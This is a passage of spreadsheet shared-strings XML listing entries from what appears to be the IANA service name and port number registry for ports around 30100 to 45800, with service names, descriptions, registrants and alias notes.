    <t>[Maxim_Baklanovsky]</t>
  </si>
  <si>
    <t>30101-30259</t>
  </si>
  <si>
    <t>kingdomsonline</t>
  </si>
  <si>
    <t>Kingdoms Online (CraigAvenue)</t>
  </si>
  <si>
    <t>[Drake_Bankston]</t>
  </si>
  <si>
    <t>30261-30399</t>
  </si>
  <si>
    <t>gs-realtime</t>
  </si>
  <si>
    <t>GroundStar RealTime System</t>
  </si>
  <si>
    <t>[INFORM_GmbH]</t>
  </si>
  <si>
    <t>[Detlef_Hilger]</t>
  </si>
  <si>
    <t>30401-30831</t>
  </si>
  <si>
    <t>samsung-disc</t>
  </si>
  <si>
    <t>Samsung Convergence Discovery Protocol</t>
  </si>
  <si>
    <t>[Samsung_2]</t>
  </si>
  <si>
    <t>[Young_Ki_Kim]</t>
  </si>
  <si>
    <t>30833-30998</t>
  </si>
  <si>
    <t>ovobs</t>
  </si>
  <si>
    <t>OpenView Service Desk Client</t>
  </si>
  <si>
    <t>[Service_Desk_Product]</t>
  </si>
  <si>
    <t>31000-31015</t>
  </si>
  <si>
    <t>ka-sddp</t>
  </si>
  <si>
    <t>Kollective Agent Secure Distributed Delivery Protocol</t>
  </si>
  <si>
    <t>[Kollective_Technology_Inc]</t>
  </si>
  <si>
    <t>[John_Wainwright]</t>
  </si>
  <si>
    <t>ka-kdp</t>
  </si>
  <si>
    <t>Kollective Agent Kollective Delivery Protocol</t>
  </si>
  <si>
    <t>31017-31019</t>
  </si>
  <si>
    <t>autotrac-acp</t>
  </si>
  <si>
    <t>Autotrac ACP 245</t>
  </si>
  <si>
    <t>[Roberto_Jorge_Dino]</t>
  </si>
  <si>
    <t>31021-31028</t>
  </si>
  <si>
    <t>yawn</t>
  </si>
  <si>
    <t>YaWN - Yet Another Windows Notifier</t>
  </si>
  <si>
    <t>[David_Spivey]</t>
  </si>
  <si>
    <t>31030-31399</t>
  </si>
  <si>
    <t>pace-licensed</t>
  </si>
  <si>
    <t>PACE license server</t>
  </si>
  <si>
    <t>[PACE_Anti-Piracy]</t>
  </si>
  <si>
    <t>[Allen_Cronce]</t>
  </si>
  <si>
    <t>31401-31415</t>
  </si>
  <si>
    <t>xqosd</t>
  </si>
  <si>
    <t>XQoS network monitor</t>
  </si>
  <si>
    <t>[Joe_Elliott]</t>
  </si>
  <si>
    <t>31417-31456</t>
  </si>
  <si>
    <t>tetrinet</t>
  </si>
  <si>
    <t>TetriNET Protocol</t>
  </si>
  <si>
    <t>[Emmanuel_Bourg]</t>
  </si>
  <si>
    <t>31458-31619</t>
  </si>
  <si>
    <t>lm-mon</t>
  </si>
  <si>
    <t>lm mon</t>
  </si>
  <si>
    <t>31621-31684</t>
  </si>
  <si>
    <t>dsx-monitor</t>
  </si>
  <si>
    <t>DS Expert Monitor
IANA assigned this well-formed service name as a replacement for "dsx_monitor".</t>
  </si>
  <si>
    <t>[John_Lowery]</t>
  </si>
  <si>
    <t>dsx_monitor</t>
  </si>
  <si>
    <t>DS Expert Monitor</t>
  </si>
  <si>
    <t>This entry is an alias to "dsx-monitor".
This entry is now historic, not usable for use with many
common service discovery mechanisms.</t>
  </si>
  <si>
    <t>31686-31764</t>
  </si>
  <si>
    <t>gamesmith-port</t>
  </si>
  <si>
    <t>GameSmith Port</t>
  </si>
  <si>
    <t>[Randy_Thompson]</t>
  </si>
  <si>
    <t>31766-31947</t>
  </si>
  <si>
    <t>iceedcp-tx</t>
  </si>
  <si>
    <t>Embedded Device Configuration Protocol TX
IANA assigned this well-formed service name as a replacement for "iceedcp_tx".</t>
  </si>
  <si>
    <t>[Oliver_Lewis]</t>
  </si>
  <si>
    <t>iceedcp_tx</t>
  </si>
  <si>
    <t>Embedded Device Configuration Protocol TX</t>
  </si>
  <si>
    <t>This entry is an alias to "iceedcp-tx".
This entry is now historic, not usable for use with many
common service discovery mechanisms.</t>
  </si>
  <si>
    <t>iceedcp-rx</t>
  </si>
  <si>
    <t>Embedded Device Configuration Protocol RX
IANA assigned this well-formed service name as a replacement for "iceedcp_rx".</t>
  </si>
  <si>
    <t>iceedcp_rx</t>
  </si>
  <si>
    <t>Embedded Device Configuration Protocol RX</t>
  </si>
  <si>
    <t>This entry is an alias to "iceedcp-rx".
This entry is now historic, not usable for use with many
common service discovery mechanisms.</t>
  </si>
  <si>
    <t>31950-32033</t>
  </si>
  <si>
    <t>iracinghelper</t>
  </si>
  <si>
    <t>iRacing helper service</t>
  </si>
  <si>
    <t>[Randy_Cassidy]</t>
  </si>
  <si>
    <t>32035-32248</t>
  </si>
  <si>
    <t>t1distproc60</t>
  </si>
  <si>
    <t>T1 Distributed Processor</t>
  </si>
  <si>
    <t>[Peter_Beahan]</t>
  </si>
  <si>
    <t>32250-32399</t>
  </si>
  <si>
    <t>plex</t>
  </si>
  <si>
    <t>Plex multimedia</t>
  </si>
  <si>
    <t>[Plex_Inc.]</t>
  </si>
  <si>
    <t>[Sasha_Hilton]</t>
  </si>
  <si>
    <t>32401-32482</t>
  </si>
  <si>
    <t>apm-link</t>
  </si>
  <si>
    <t>Access Point Manager Link</t>
  </si>
  <si>
    <t>[Tony_Diodato]</t>
  </si>
  <si>
    <t>32484-32634</t>
  </si>
  <si>
    <t>sec-ntb-clnt</t>
  </si>
  <si>
    <t>SecureNotebook-CLNT</t>
  </si>
  <si>
    <t>[Eric_Cantineau]</t>
  </si>
  <si>
    <t>DMExpress</t>
  </si>
  <si>
    <t>[Arnie_Farrelly]</t>
  </si>
  <si>
    <t>32637-32766</t>
  </si>
  <si>
    <t>filenet-powsrm</t>
  </si>
  <si>
    <t>FileNet BPM WS-ReliableMessaging Client</t>
  </si>
  <si>
    <t>[Chris_Adkins]</t>
  </si>
  <si>
    <t>filenet-tms</t>
  </si>
  <si>
    <t>Filenet TMS</t>
  </si>
  <si>
    <t>[Daniel_Whelan]</t>
  </si>
  <si>
    <t>filenet-rpc</t>
  </si>
  <si>
    <t>Filenet RPC</t>
  </si>
  <si>
    <t>filenet-nch</t>
  </si>
  <si>
    <t>Filenet NCH</t>
  </si>
  <si>
    <t>filenet-rmi</t>
  </si>
  <si>
    <t>FileNET RMI</t>
  </si>
  <si>
    <t>FileNet RMI</t>
  </si>
  <si>
    <t>filenet-pa</t>
  </si>
  <si>
    <t>FileNET Process Analyzer</t>
  </si>
  <si>
    <t>filenet-cm</t>
  </si>
  <si>
    <t>FileNET Component Manager</t>
  </si>
  <si>
    <t>filenet-re</t>
  </si>
  <si>
    <t>FileNET Rules Engine</t>
  </si>
  <si>
    <t>filenet-pch</t>
  </si>
  <si>
    <t>Performance Clearinghouse</t>
  </si>
  <si>
    <t>[Tim_Morgan_2]</t>
  </si>
  <si>
    <t>filenet-peior</t>
  </si>
  <si>
    <t>FileNET BPM IOR</t>
  </si>
  <si>
    <t>filenet-obrok</t>
  </si>
  <si>
    <t>FileNet BPM CORBA</t>
  </si>
  <si>
    <t>32778-32800</t>
  </si>
  <si>
    <t>mlsn</t>
  </si>
  <si>
    <t>Multiple Listing Service Network</t>
  </si>
  <si>
    <t>[Corey_Leong]</t>
  </si>
  <si>
    <t>32802-32810</t>
  </si>
  <si>
    <t>retp</t>
  </si>
  <si>
    <t>Real Estate Transport Protocol</t>
  </si>
  <si>
    <t>32812-32895</t>
  </si>
  <si>
    <t>idmgratm</t>
  </si>
  <si>
    <t>Attachmate ID Manager</t>
  </si>
  <si>
    <t>[George_Gianelos_2]</t>
  </si>
  <si>
    <t>32897-32999</t>
  </si>
  <si>
    <t>wg-endpt-comms</t>
  </si>
  <si>
    <t>WatchGuard Endpoint Communications</t>
  </si>
  <si>
    <t>[WatchGuard_Technologies_Inc]</t>
  </si>
  <si>
    <t>[Anunoy_Ghosh]</t>
  </si>
  <si>
    <t>33001-33059</t>
  </si>
  <si>
    <t>mysqlx</t>
  </si>
  <si>
    <t>MySQL Database Extended Interface</t>
  </si>
  <si>
    <t>[Oracle_8]</t>
  </si>
  <si>
    <t>[Omer_BarNir]</t>
  </si>
  <si>
    <t>33061-33122</t>
  </si>
  <si>
    <t>aurora-balaena</t>
  </si>
  <si>
    <t>Aurora (Balaena Ltd)</t>
  </si>
  <si>
    <t>[Andrew_Mather]</t>
  </si>
  <si>
    <t>33124-33330</t>
  </si>
  <si>
    <t>diamondport</t>
  </si>
  <si>
    <t>DiamondCentral Interface</t>
  </si>
  <si>
    <t>[Edward_Browdy]</t>
  </si>
  <si>
    <t>dgi-serv</t>
  </si>
  <si>
    <t>Digital Gaslight Service</t>
  </si>
  <si>
    <t>[George_Flanagin]</t>
  </si>
  <si>
    <t>speedtrace</t>
  </si>
  <si>
    <t>SpeedTrace TraceAgent</t>
  </si>
  <si>
    <t>[Holger_Heinrich]</t>
  </si>
  <si>
    <t>speedtrace-disc</t>
  </si>
  <si>
    <t>SpeedTrace TraceAgent Discovery</t>
  </si>
  <si>
    <t>33335-33433</t>
  </si>
  <si>
    <t>traceroute use</t>
  </si>
  <si>
    <t>mtrace</t>
  </si>
  <si>
    <t>IP Multicast Traceroute</t>
  </si>
  <si>
    <t>[RFC8487]</t>
  </si>
  <si>
    <t>Known Unauthorized Use on port 33435</t>
  </si>
  <si>
    <t>33436-33655</t>
  </si>
  <si>
    <t>Known Unauthorized Use on ports 33436-33534</t>
  </si>
  <si>
    <t>snip-slave</t>
  </si>
  <si>
    <t>SNIP Slave</t>
  </si>
  <si>
    <t>[Dr_Chris_Tucker]</t>
  </si>
  <si>
    <t>33657-33889</t>
  </si>
  <si>
    <t>digilent-adept</t>
  </si>
  <si>
    <t>Adept IP protocol</t>
  </si>
  <si>
    <t>[Digilent_Inc]</t>
  </si>
  <si>
    <t>[Michael_T_Alexander]</t>
  </si>
  <si>
    <t>33891-34248</t>
  </si>
  <si>
    <t>turbonote-2</t>
  </si>
  <si>
    <t>TurboNote Relay Server Default Port</t>
  </si>
  <si>
    <t>[Peter_Hyde]</t>
  </si>
  <si>
    <t>34250-34377</t>
  </si>
  <si>
    <t>p-net-local</t>
  </si>
  <si>
    <t>P-Net on IP local</t>
  </si>
  <si>
    <t>[Kurt_Nissen]</t>
  </si>
  <si>
    <t>p-net-remote</t>
  </si>
  <si>
    <t>P-Net on IP remote</t>
  </si>
  <si>
    <t>34380-34566</t>
  </si>
  <si>
    <t>dhanalakshmi</t>
  </si>
  <si>
    <t>dhanalakshmi.org EDI Service</t>
  </si>
  <si>
    <t>[Girish_Gopalakrishna]</t>
  </si>
  <si>
    <t>edi_service</t>
  </si>
  <si>
    <t>34568-34961</t>
  </si>
  <si>
    <t>profinet-rt</t>
  </si>
  <si>
    <t>PROFInet RT Unicast</t>
  </si>
  <si>
    <t>[Peter_Wenzel]</t>
  </si>
  <si>
    <t>profinet-rtm</t>
  </si>
  <si>
    <t>PROFInet RT Multicast</t>
  </si>
  <si>
    <t>profinet-cm</t>
  </si>
  <si>
    <t>PROFInet Context Manager</t>
  </si>
  <si>
    <t>34965-34979</t>
  </si>
  <si>
    <t>ethercat</t>
  </si>
  <si>
    <t>EtherCAT Port</t>
  </si>
  <si>
    <t>[Martin_Rostan]</t>
  </si>
  <si>
    <t>34981-34999</t>
  </si>
  <si>
    <t>heathview</t>
  </si>
  <si>
    <t>HeathView</t>
  </si>
  <si>
    <t>[Heathwest_Systems_Limited]</t>
  </si>
  <si>
    <t>[Andrew_Porrer]</t>
  </si>
  <si>
    <t>rt-viewer</t>
  </si>
  <si>
    <t>ReadyTech Viewer</t>
  </si>
  <si>
    <t>[ReadyTech_Corporation]</t>
  </si>
  <si>
    <t>[Kevin_Woodward]</t>
  </si>
  <si>
    <t>rt-sound</t>
  </si>
  <si>
    <t>ReadyTech Sound Server</t>
  </si>
  <si>
    <t>rt-devicemapper</t>
  </si>
  <si>
    <t>ReadyTech DeviceMapper Server</t>
  </si>
  <si>
    <t>rt-classmanager</t>
  </si>
  <si>
    <t>ReadyTech ClassManager</t>
  </si>
  <si>
    <t>rt-labtracker</t>
  </si>
  <si>
    <t>ReadyTech LabTracker</t>
  </si>
  <si>
    <t>rt-helper</t>
  </si>
  <si>
    <t>ReadyTech Helper Service</t>
  </si>
  <si>
    <t>35007-35099</t>
  </si>
  <si>
    <t>axio-disc</t>
  </si>
  <si>
    <t>Axiomatic discovery protocol</t>
  </si>
  <si>
    <t>[Axiomatic_Technologies_Corporation]</t>
  </si>
  <si>
    <t>[Oleksandr_Bogush]</t>
  </si>
  <si>
    <t>35101-35353</t>
  </si>
  <si>
    <t>kitim</t>
  </si>
  <si>
    <t>KIT Messenger</t>
  </si>
  <si>
    <t>[Rudi_Visser]</t>
  </si>
  <si>
    <t>altova-lm</t>
  </si>
  <si>
    <t>Altova License Management</t>
  </si>
  <si>
    <t>[Alexander_Falk_2]</t>
  </si>
  <si>
    <t>altova-lm-disc</t>
  </si>
  <si>
    <t>Altova License Management Discovery</t>
  </si>
  <si>
    <t>guttersnex</t>
  </si>
  <si>
    <t>Gutters Note Exchange</t>
  </si>
  <si>
    <t>[Squee_Application_Development]</t>
  </si>
  <si>
    <t>[Tristan_Seifert_2]</t>
  </si>
  <si>
    <t>openstack-id</t>
  </si>
  <si>
    <t>OpenStack ID Service</t>
  </si>
  <si>
    <t>[Rackspace_Hosting]</t>
  </si>
  <si>
    <t>[Ziad_Sawalha]</t>
  </si>
  <si>
    <t>35358-36000</t>
  </si>
  <si>
    <t>allpeers</t>
  </si>
  <si>
    <t>AllPeers Network</t>
  </si>
  <si>
    <t>[Cedric_Maloux]</t>
  </si>
  <si>
    <t>36002-36410</t>
  </si>
  <si>
    <t>wlcp</t>
  </si>
  <si>
    <t>Wireless LAN Control plane Protocol (WLCP)</t>
  </si>
  <si>
    <t>s1-control</t>
  </si>
  <si>
    <t>S1-Control Plane (3GPP)</t>
  </si>
  <si>
    <t>36413-36421</t>
  </si>
  <si>
    <t>x2-control</t>
  </si>
  <si>
    <t>X2-Control Plane (3GPP)</t>
  </si>
  <si>
    <t>slmap</t>
  </si>
  <si>
    <t>SLm Interface Application Protocol</t>
  </si>
  <si>
    <t>[ThreeGPP_4]</t>
  </si>
  <si>
    <t>nq-ap</t>
  </si>
  <si>
    <t>Nq and Nq' Application Protocol</t>
  </si>
  <si>
    <t>36425-36442</t>
  </si>
  <si>
    <t>m2ap</t>
  </si>
  <si>
    <t>M2 Application Part</t>
  </si>
  <si>
    <t>m3ap</t>
  </si>
  <si>
    <t>M3 Application Part</t>
  </si>
  <si>
    <t>36445-36461</t>
  </si>
  <si>
    <t>xw-control</t>
  </si>
  <si>
    <t>Xw-Control Plane (3GPP)</t>
  </si>
  <si>
    <t>[Boubacar_KIMNBA_DIT_ADAMOU]</t>
  </si>
  <si>
    <t>36463-36523</t>
  </si>
  <si>
    <t>febooti-aw</t>
  </si>
  <si>
    <t>Febooti Automation Workshop</t>
  </si>
  <si>
    <t>[Maris_Bormanis]</t>
  </si>
  <si>
    <t>36525-36601</t>
  </si>
  <si>
    <t>observium-agent</t>
  </si>
  <si>
    <t>Observium statistics collection agent</t>
  </si>
  <si>
    <t>[Observium]</t>
  </si>
  <si>
    <t>[Adam_Armstrong]</t>
  </si>
  <si>
    <t>36603-36699</t>
  </si>
  <si>
    <t>mapx</t>
  </si>
  <si>
    <t>MapX communication</t>
  </si>
  <si>
    <t>[MicroTechniX]</t>
  </si>
  <si>
    <t>[Yarochkin_Michail]</t>
  </si>
  <si>
    <t>36701-36864</t>
  </si>
  <si>
    <t>kastenxpipe</t>
  </si>
  <si>
    <t>KastenX Pipe</t>
  </si>
  <si>
    <t>[Guy_Cheng]</t>
  </si>
  <si>
    <t>36866-37474</t>
  </si>
  <si>
    <t>neckar</t>
  </si>
  <si>
    <t>science + computing's Venus Administration Port</t>
  </si>
  <si>
    <t>[Ralf_Allrutz]</t>
  </si>
  <si>
    <t>37476-37482</t>
  </si>
  <si>
    <t>gdrive-sync</t>
  </si>
  <si>
    <t>Google Drive Sync</t>
  </si>
  <si>
    <t>[Google_Inc]</t>
  </si>
  <si>
    <t>[Jason_Schiller]</t>
  </si>
  <si>
    <t>37484-37600</t>
  </si>
  <si>
    <t>eftp</t>
  </si>
  <si>
    <t>Epipole File Transfer Protocol</t>
  </si>
  <si>
    <t>[Epipole_Limited]</t>
  </si>
  <si>
    <t>[Colin_Buchanan]</t>
  </si>
  <si>
    <t>37602-37653</t>
  </si>
  <si>
    <t>unisys-eportal</t>
  </si>
  <si>
    <t>Unisys ClearPath ePortal</t>
  </si>
  <si>
    <t>[Sung_U_Ro]</t>
  </si>
  <si>
    <t>37655-37999</t>
  </si>
  <si>
    <t>ivs-database</t>
  </si>
  <si>
    <t>InfoVista Server Database</t>
  </si>
  <si>
    <t>[InfoVista]</t>
  </si>
  <si>
    <t>[Sebastien_Bouchex_Bellomie]</t>
  </si>
  <si>
    <t>ivs-insertion</t>
  </si>
  <si>
    <t>InfoVista Server Insertion</t>
  </si>
  <si>
    <t>cresco-control</t>
  </si>
  <si>
    <t>Cresco Controller</t>
  </si>
  <si>
    <t>[UofK]</t>
  </si>
  <si>
    <t>[Cody_Bumgardner]</t>
  </si>
  <si>
    <t>crescoctrl-disc</t>
  </si>
  <si>
    <t>Cresco Controller Discovery</t>
  </si>
  <si>
    <t>38003-38200</t>
  </si>
  <si>
    <t>galaxy7-data</t>
  </si>
  <si>
    <t>Galaxy7 Data Tunnel</t>
  </si>
  <si>
    <t>[Tatham_Oddie]</t>
  </si>
  <si>
    <t>fairview</t>
  </si>
  <si>
    <t>Fairview Message Service</t>
  </si>
  <si>
    <t>[Jim_Lyle]</t>
  </si>
  <si>
    <t>Defined TXT keys: DevID=&lt;device id&gt;, DevType=&lt;device type&gt;, DevStat=&lt;device status&gt;</t>
  </si>
  <si>
    <t>agpolicy</t>
  </si>
  <si>
    <t>AppGate Policy Server</t>
  </si>
  <si>
    <t>[Martin_Forssen]</t>
  </si>
  <si>
    <t>38204-38411</t>
  </si>
  <si>
    <t>ng-control</t>
  </si>
  <si>
    <t>NG Control Plane (3GPP)</t>
  </si>
  <si>
    <t>[Luis_Lopes]</t>
  </si>
  <si>
    <t>38413-38421</t>
  </si>
  <si>
    <t>xn-control</t>
  </si>
  <si>
    <t>Xn Control Plane (3GPP)</t>
  </si>
  <si>
    <t>38423-38461</t>
  </si>
  <si>
    <t>e1-interface</t>
  </si>
  <si>
    <t>E1 signalling transport (3GPP)</t>
  </si>
  <si>
    <t>[Huawei_Technologies_France]</t>
  </si>
  <si>
    <t>[Yang_Xudong][Issam_Toufik]</t>
  </si>
  <si>
    <t>38463-38471</t>
  </si>
  <si>
    <t>f1-control</t>
  </si>
  <si>
    <t>F1 Control Plane (3GPP)</t>
  </si>
  <si>
    <t>38473-38799</t>
  </si>
  <si>
    <t>sruth</t>
  </si>
  <si>
    <t>Sruth is a service for the distribution of routinely-
      generated but arbitrary files based on a publish/subscribe
      distribution model and implemented using a peer-to-peer transport
      mechanism</t>
  </si>
  <si>
    <t>[University_Corporation_for_Atmospheric_Research]</t>
  </si>
  <si>
    <t>[Steven_Emmerson]</t>
  </si>
  <si>
    <t>38801-38864</t>
  </si>
  <si>
    <t>secrmmsafecopya</t>
  </si>
  <si>
    <t>Security approval process for use of the secRMM SafeCopy program</t>
  </si>
  <si>
    <t>[Squadra_Technologies]</t>
  </si>
  <si>
    <t>[Anthony_LaMark]</t>
  </si>
  <si>
    <t>38866-39680</t>
  </si>
  <si>
    <t>turbonote-1</t>
  </si>
  <si>
    <t>TurboNote Default Port</t>
  </si>
  <si>
    <t>39682-39999</t>
  </si>
  <si>
    <t>safetynetp</t>
  </si>
  <si>
    <t>SafetyNET p</t>
  </si>
  <si>
    <t>[Roland_Rupp]</t>
  </si>
  <si>
    <t>40001-40022</t>
  </si>
  <si>
    <t>k-patentssensor</t>
  </si>
  <si>
    <t>K-PatentsSensorInformation</t>
  </si>
  <si>
    <t>[K-Patents_Oy]</t>
  </si>
  <si>
    <t>[Saku_Lahteenmaki]</t>
  </si>
  <si>
    <t>40024-40403</t>
  </si>
  <si>
    <t>sptx</t>
  </si>
  <si>
    <t>Simplify Printing TX</t>
  </si>
  <si>
    <t>[Tricerat]</t>
  </si>
  <si>
    <t>[Eric_Musgrave]</t>
  </si>
  <si>
    <t>40405-40840</t>
  </si>
  <si>
    <t>cscp</t>
  </si>
  <si>
    <t>CSCP</t>
  </si>
  <si>
    <t>[Michael_Dodge]</t>
  </si>
  <si>
    <t>csccredir</t>
  </si>
  <si>
    <t>CSCCREDIR</t>
  </si>
  <si>
    <t>[Sudhir_Menon]</t>
  </si>
  <si>
    <t>csccfirewall</t>
  </si>
  <si>
    <t>CSCCFIREWALL</t>
  </si>
  <si>
    <t>40844-40852</t>
  </si>
  <si>
    <t>ortec-disc</t>
  </si>
  <si>
    <t>ORTEC Service Discovery</t>
  </si>
  <si>
    <t>[Jesse_Ursery]</t>
  </si>
  <si>
    <t>40854-41110</t>
  </si>
  <si>
    <t>fs-qos</t>
  </si>
  <si>
    <t>Foursticks QoS Protocol</t>
  </si>
  <si>
    <t>[Chee_Kent_Lam]</t>
  </si>
  <si>
    <t>41112-41120</t>
  </si>
  <si>
    <t>tentacle</t>
  </si>
  <si>
    <t>Tentacle Server</t>
  </si>
  <si>
    <t>[Sancho_Lerena]</t>
  </si>
  <si>
    <t>41122-41229</t>
  </si>
  <si>
    <t>z-wave-s</t>
  </si>
  <si>
    <t>Z-Wave Protocol over SSL/TLS</t>
  </si>
  <si>
    <t>[Sigma_Designs_3]</t>
  </si>
  <si>
    <t>[Anders_Brandt_4]</t>
  </si>
  <si>
    <t>Z-Wave Protocol over DTLS</t>
  </si>
  <si>
    <t>41231-41793</t>
  </si>
  <si>
    <t>crestron-cip</t>
  </si>
  <si>
    <t>Crestron Control Port</t>
  </si>
  <si>
    <t>[Crestron_Electronics]</t>
  </si>
  <si>
    <t>[John_Pavlik]</t>
  </si>
  <si>
    <t>crestron-ctp</t>
  </si>
  <si>
    <t>Crestron Terminal Port</t>
  </si>
  <si>
    <t>crestron-cips</t>
  </si>
  <si>
    <t>Crestron Secure Control Port</t>
  </si>
  <si>
    <t>crestron-ctps</t>
  </si>
  <si>
    <t>Crestron Secure Terminal Port</t>
  </si>
  <si>
    <t>41798-42507</t>
  </si>
  <si>
    <t>Unauthorized Use Known on port 42000</t>
  </si>
  <si>
    <t>candp</t>
  </si>
  <si>
    <t>Computer Associates network discovery protocol</t>
  </si>
  <si>
    <t>candrp</t>
  </si>
  <si>
    <t>CA discovery response</t>
  </si>
  <si>
    <t>caerpc</t>
  </si>
  <si>
    <t>CA eTrust RPC</t>
  </si>
  <si>
    <t>42511-42999</t>
  </si>
  <si>
    <t>recvr-rc</t>
  </si>
  <si>
    <t>Receiver Remote Control</t>
  </si>
  <si>
    <t>[Research_Electronics_International]</t>
  </si>
  <si>
    <t>[Ross_Binkley]</t>
  </si>
  <si>
    <t>recvr-rc-disc</t>
  </si>
  <si>
    <t>Receiver Remote Control Discovery</t>
  </si>
  <si>
    <t>43001-43187</t>
  </si>
  <si>
    <t>reachout</t>
  </si>
  <si>
    <t>REACHOUT</t>
  </si>
  <si>
    <t>ndm-agent-port</t>
  </si>
  <si>
    <t>NDM-AGENT-PORT</t>
  </si>
  <si>
    <t>ip-provision</t>
  </si>
  <si>
    <t>IP-PROVISION</t>
  </si>
  <si>
    <t>noit-transport</t>
  </si>
  <si>
    <t>Reconnoiter Agent Data Transport</t>
  </si>
  <si>
    <t>[Theo_Schlossnagle]</t>
  </si>
  <si>
    <t>43192-43209</t>
  </si>
  <si>
    <t>shaperai</t>
  </si>
  <si>
    <t>Shaper Automation Server Management</t>
  </si>
  <si>
    <t>[Shaper_Automation]</t>
  </si>
  <si>
    <t>[Yohann_Sulaiman]</t>
  </si>
  <si>
    <t>shaperai-disc</t>
  </si>
  <si>
    <t>Shaper Automation Server Management Discovery</t>
  </si>
  <si>
    <t>43211-43437</t>
  </si>
  <si>
    <t>hmip-routing</t>
  </si>
  <si>
    <t>HmIP LAN Routing</t>
  </si>
  <si>
    <t>[eQ-3_Entwicklung_GmbH]</t>
  </si>
  <si>
    <t>[Tido_de_Vries]</t>
  </si>
  <si>
    <t>eq3-update</t>
  </si>
  <si>
    <t>EQ3 firmware update</t>
  </si>
  <si>
    <t>eq3-config</t>
  </si>
  <si>
    <t>EQ3 discovery and configuration</t>
  </si>
  <si>
    <t>ew-mgmt</t>
  </si>
  <si>
    <t>Cisco EnergyWise Management</t>
  </si>
  <si>
    <t>ew-disc-cmd</t>
  </si>
  <si>
    <t>Cisco EnergyWise Discovery and Command Flooding</t>
  </si>
  <si>
    <t>[John_Parello]</t>
  </si>
  <si>
    <t>ciscocsdb</t>
  </si>
  <si>
    <t>Cisco NetMgmt DB Ports</t>
  </si>
  <si>
    <t>[Cisco_Systems]</t>
  </si>
  <si>
    <t>43442-44122</t>
  </si>
  <si>
    <t>z-wave-tunnel</t>
  </si>
  <si>
    <t>Z-Wave Secure Tunnel</t>
  </si>
  <si>
    <t>[Sigma_Designs_Inc]</t>
  </si>
  <si>
    <t>[Anders_Brandt_3]</t>
  </si>
  <si>
    <t>44124-44320</t>
  </si>
  <si>
    <t>pmcd</t>
  </si>
  <si>
    <t>PCP server (pmcd)</t>
  </si>
  <si>
    <t>[Ken_McDonell]</t>
  </si>
  <si>
    <t>pmcdproxy</t>
  </si>
  <si>
    <t>PCP server (pmcd) proxy</t>
  </si>
  <si>
    <t>pmwebapi</t>
  </si>
  <si>
    <t>HTTP binding for Performance Co-Pilot client API</t>
  </si>
  <si>
    <t>[Performance_Co-Pilot_PCP_Project]</t>
  </si>
  <si>
    <t>[Ken_McDonell_2]</t>
  </si>
  <si>
    <t>"pcp" assignment withdrawn, moved to port 5351 per RFC6887</t>
  </si>
  <si>
    <t>44324-44443</t>
  </si>
  <si>
    <t>cognex-dataman</t>
  </si>
  <si>
    <t>Cognex DataMan Management Protocol</t>
  </si>
  <si>
    <t>[Cognex]</t>
  </si>
  <si>
    <t>[Mario_Joussen]</t>
  </si>
  <si>
    <t>acronis-backup</t>
  </si>
  <si>
    <t>Acronis Backup Gateway service port</t>
  </si>
  <si>
    <t>[Acronis]</t>
  </si>
  <si>
    <t>[Kevin_Reed]</t>
  </si>
  <si>
    <t>44446-44543</t>
  </si>
  <si>
    <t>Known UNAUTHORIZED USE: Ports 44515 &amp; 44516</t>
  </si>
  <si>
    <t>domiq</t>
  </si>
  <si>
    <t>DOMIQ Building Automation</t>
  </si>
  <si>
    <t>[DOMIQ_Sp_zoo]</t>
  </si>
  <si>
    <t>[Filip_Zawadiak]</t>
  </si>
  <si>
    <t>44545-44552</t>
  </si>
  <si>
    <t>rbr-debug</t>
  </si>
  <si>
    <t>REALbasic Remote Debug</t>
  </si>
  <si>
    <t>[Aaron_Ballman]</t>
  </si>
  <si>
    <t>44554-44599</t>
  </si>
  <si>
    <t>asihpi</t>
  </si>
  <si>
    <t>AudioScience HPI</t>
  </si>
  <si>
    <t>[Eliot_Blennerhassett]</t>
  </si>
  <si>
    <t>44601-44817</t>
  </si>
  <si>
    <t>EtherNet-IP-2</t>
  </si>
  <si>
    <t>EtherNet/IP messaging
IANA assigned this well-formed service name as a replacement for "EtherNet/IP-2".</t>
  </si>
  <si>
    <t>New contact added for port 44818 on 2008-02-01</t>
  </si>
  <si>
    <t>EtherNet/IP-2</t>
  </si>
  <si>
    <t>EtherNet/IP messaging</t>
  </si>
  <si>
    <t>New contact added for port 44818 on 2008-02-01
This entry is an alias to "EtherNet-IP-2".
This entry is now historic, not usable for use with many
common service discovery mechanisms.</t>
  </si>
  <si>
    <t>44819-44899</t>
  </si>
  <si>
    <t>m3da</t>
  </si>
  <si>
    <t>M3DA is used for efficient machine-to-machine communications</t>
  </si>
  <si>
    <t>[Eclipse_Foundation]</t>
  </si>
  <si>
    <t>[Didier_Lahay]</t>
  </si>
  <si>
    <t>m3da-disc</t>
  </si>
  <si>
    <t>M3DA Discovery is used for efficient machine-to-machine communications</t>
  </si>
  <si>
    <t>44901-44999</t>
  </si>
  <si>
    <t>asmp</t>
  </si>
  <si>
    <t>Nuance AutoStore Status Monitoring Protocol (data transfer)</t>
  </si>
  <si>
    <t>[Nuance_Communications_Inc4]</t>
  </si>
  <si>
    <t>[Andrew_Andrews]</t>
  </si>
  <si>
    <t>asmp-mon</t>
  </si>
  <si>
    <t>Nuance AutoStore Status Monitoring Protocol (device monitoring)</t>
  </si>
  <si>
    <t>asmps</t>
  </si>
  <si>
    <t>Nuance AutoStore Status Monitoring Protocol (secure data transfer)</t>
  </si>
  <si>
    <t>rs-status</t>
  </si>
  <si>
    <t>Redspeed Status Monitor</t>
  </si>
  <si>
    <t>[Redspeed_International_Ltd]</t>
  </si>
  <si>
    <t>[Simon_Griffiths]</t>
  </si>
  <si>
    <t>45003-45044</t>
  </si>
  <si>
    <t>synctest</t>
  </si>
  <si>
    <t>Remote application control protocol</t>
  </si>
  <si>
    <t>[Eleks_Ltd]</t>
  </si>
  <si>
    <t>[Andriy_Skop]</t>
  </si>
  <si>
    <t>45046-45053</t>
  </si>
  <si>
    <t>invision-ag</t>
  </si>
  <si>
    <t>InVision AG</t>
  </si>
  <si>
    <t>[Matthias_Schroer]</t>
  </si>
  <si>
    <t>45055-45513</t>
  </si>
  <si>
    <t>cloudcheck</t>
  </si>
  <si>
    <t>ASSIA CloudCheck WiFi Management System</t>
  </si>
  <si>
    <t>[ASSIA_Inc]</t>
  </si>
  <si>
    <t>[Leonardo_Dagum]</t>
  </si>
  <si>
    <t>cloudcheck-ping</t>
  </si>
  <si>
    <t>ASSIA CloudCheck WiFi Management keepalive</t>
  </si>
  <si>
    <t>45515-45677</t>
  </si>
  <si>
    <t>eba</t>
  </si>
  <si>
    <t>EBA PRISE</t>
  </si>
  <si>
    <t>45679-45823</t>
